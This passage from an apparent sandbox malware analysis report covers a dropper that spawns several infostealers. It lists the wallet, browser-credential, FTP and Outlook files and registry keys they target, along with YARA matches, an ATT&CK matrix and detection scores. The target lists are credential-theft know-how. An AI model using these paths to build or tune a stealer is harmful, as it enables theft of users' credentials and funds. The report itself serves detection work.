Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: stealc_default2.exe, 00000014.00000002.3033783708.0000000001680000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: RegAsm.exe, 0000000C.00000002.2724562892.0000000000479000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: set_UseMachineKeyStore
Source: stealc_default2.exe, 00000014.00000002.3033783708.0000000001680000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: stealc_default2.exe, 00000014.00000002.3033783708.0000000001768000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\.

Tries to harvest and steal Bitcoin Wallet information

Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-core

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite-wal
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History-journal
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite-shm
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
Source: C:\Users\user\AppData\Roaming\6rxotqIg7H.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Cookies
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\prefs.js
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite-shm
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite-wal
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies

Tries to harvest and steal ftp login credentials

Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe

File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml

Tries to steal Crypto Currency Wallets

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\atomic\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Binance\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\Cache\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\db\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Ethereum\wallets\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\	Jump to behavior
Source: C:\Users\user\AppData\Roaming\6rxotqIg7H.exe	File opened: C:\Users\user\AppData\Roaming\atomic\
Source: C:\Users\user\AppData\Roaming\6rxotqIg7H.exe	File opened: C:\Users\user\AppData\Roaming\Binance\
Source: C:\Users\user\AppData\Roaming\6rxotqIg7H.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\Cache\
Source: C:\Users\user\AppData\Roaming\6rxotqIg7H.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\db\
Source: C:\Users\user\AppData\Roaming\6rxotqIg7H.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\
Source: C:\Users\user\AppData\Roaming\6rxotqIg7H.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\
Source: C:\Users\user\AppData\Roaming\6rxotqIg7H.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
Source: C:\Users\user\AppData\Roaming\6rxotqIg7H.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
Source: C:\Users\user\AppData\Roaming\6rxotqIg7H.exe	File opened: C:\Users\user\AppData\Roaming\Ethereum\wallets\
Source: C:\Users\user\AppData\Roaming\6rxotqIg7H.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
Source: C:\Users\user\AppData\Roaming\6rxotqIg7H.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
Source: C:\Users\user\AppData\Roaming\6rxotqIg7H.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\
Source: C:\Users\user\AppData\Roaming\6rxotqIg7H.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\
Source: C:\Users\user\AppData\Roaming\6rxotqIg7H.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File opened: C:\Users\user\AppData\Roaming\MultiDoge\
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File opened: C:\Users\user\AppData\Roaming\jaxx\Local Storage\
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File opened: C:\Users\user\AppData\Roaming\Binance\
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File opened: C:\Users\user\AppData\Roaming\Coinomi\Coinomi\wallets\
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File opened: C:\Users\user\AppData\Roaming\atomic_qt\config\
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\

Tries to steal Mail credentials (via file / registry access)

Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000004

Source: Yara match	File source: 00000009.00000002.2842758634.0000000002BC9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.2867303710.0000000003168000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 5144, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 6rxotqIg7H.exe PID: 5952, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: stealc_default2.exe PID: 6624, type: MEMORYSTR

Remote Access Functionality

Yara detected LummaC Stealer

Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match	File source: 24.2.PureSyncInst.exe.1d10000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 44.2.BitLockerToGo.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 21.2.caesium-image-compressor.exe.1c30000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 24.2.PureSyncInst.exe.1ccc000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 24.3.PureSyncInst.exe.1d10000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 24.3.PureSyncInst.exe.1d10000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 24.2.PureSyncInst.exe.1d10000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 22.2.BitLockerToGo.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 24.2.PureSyncInst.exe.1ccc000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 21.2.caesium-image-compressor.exe.1c30000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 21.2.caesium-image-compressor.exe.1be4000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 24.3.PureSyncInst.exe.1ccc000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 22.2.BitLockerToGo.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 44.2.BitLockerToGo.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 21.2.caesium-image-compressor.exe.1be4000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 24.3.PureSyncInst.exe.1ccc000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000002C.00000002.3330388313.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000003.3204266932.0000000001D10000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000002.2965363912.00000000018D2000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000002.3327893982.00000000018D6000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000003.3204266932.0000000001CCC000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000002.3371228781.0000000001E19000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000003.3204266932.0000000001E19000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000002.2975908580.0000000001DE7000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000002.2975464614.0000000001B4C000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000002.3000690685.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000002.3371228781.0000000001CCC000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000002.2975464614.0000000001C30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000003.2957476998.0000000001DE7000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000002.2975464614.0000000001BE4000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000002.3371228781.0000000001D10000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

Yara detected PureLog Stealer

Source: Yara match	File source: 12.2.RegAsm.exe.482060.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.0.pLAZbVgk7u.exe.1c0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.RegAsm.exe.482060.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000C.00000002.2724562892.0000000000479000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000000.2723547615.00000000001C2000.00000002.00000001.01000000.0000000D.sdmp, type: MEMORY
Source: Yara match	File source: C:\Users\user\AppData\Roaming\pLAZbVgk7u.exe, type: DROPPED

Yara detected RedLine Stealer

Source: Yara match	File source: dump.pcap, type: PCAP
Source: Yara match	File source: 7.2.crypted.exe.3fc5570.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.RegAsm.exe.436060.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.crypted.exe.3fc5570.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.RegAsm.exe.436060.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.0.6rxotqIg7H.exe.ce0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000C.00000002.2724562892.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2691967398.0000000003FC5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.2867303710.0000000003168000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000000.2724132947.0000000000CE2000.00000002.00000001.01000000.0000000E.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2835698109.0000000000421000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: crypted.exe PID: 5328, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 5144, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 6332, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: pLAZbVgk7u.exe PID: 6448, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 6rxotqIg7H.exe PID: 5952, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Roaming\6rxotqIg7H.exe, type: DROPPED

Yara detected Stealc

Source: Yara match	File source: 00000014.00000002.3033783708.000000000168E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: stealc_default2.exe PID: 6624, type: MEMORYSTR
Source: Yara match	File source: dump.pcap, type: PCAP

Yara detected Vidar stealer

Source: Yara match

File source: Process Memory Space: stealc_default2.exe PID: 6624, type: MEMORYSTR

Yara detected zgRAT

Source: Yara match	File source: 12.2.RegAsm.exe.482060.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.0.pLAZbVgk7u.exe.1c0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.RegAsm.exe.482060.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: C:\Users\user\AppData\Roaming\pLAZbVgk7u.exe, type: DROPPED

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	111 Scripting	Valid Accounts	231 Windows Management Instrumentation	111 Scripting	1 DLL Side-Loading	1 Disable or Modify Tools	2 OS Credential Dumping	1 System Time Discovery	Remote Services	1 Archive Collected Data	13 Ingress Tool Transfer	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	12 Command and Scripting Interpreter	1 DLL Side-Loading	412 Process Injection	11 Deobfuscate/Decode Files or Information	11 Input Capture	3 File and Directory Discovery	Remote Desktop Protocol	4 Data from Local System	11 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	11 Scheduled Task/Job	11 Scheduled Task/Job	11 Scheduled Task/Job	4 Obfuscated Files or Information	Security Account Manager	377 System Information Discovery	SMB/Windows Admin Shares	1 Email Collection	1 Non-Standard Port	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	1 PowerShell	21 Registry Run Keys / Startup Folder	21 Registry Run Keys / Startup Folder	1 Install Root Certificate	NTDS	1091 Security Software Discovery	Distributed Component Object Model	11 Input Capture	4 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	23 Software Packing	LSA Secrets	3 Process Discovery	SSH	Keylogging	125 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 DLL Side-Loading	Cached Domain Credentials	471 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	111 Masquerading	DCSync	1 Application Window Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	471 Virtualization/Sandbox Evasion	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	412 Process Injection	/etc/passwd and /etc/shadow	Network Sniffing	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
OmnqazpM3P.exe	58%	Virustotal		Browse
OmnqazpM3P.exe	66%	ReversingLabs	Win32.Packed.Themida
OmnqazpM3P.exe	100%	Avira	TR/Crypt.TPM.Gen
OmnqazpM3P.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label
C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe	100%	Joe Sandbox ML
C:\Users\user\1000238002\Amadeus.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\Amadeus[1].exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\setup[1].exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\stealc_default2[1].exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\Nework[1].exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\crypteda[1].exe	100%	Joe Sandbox ML
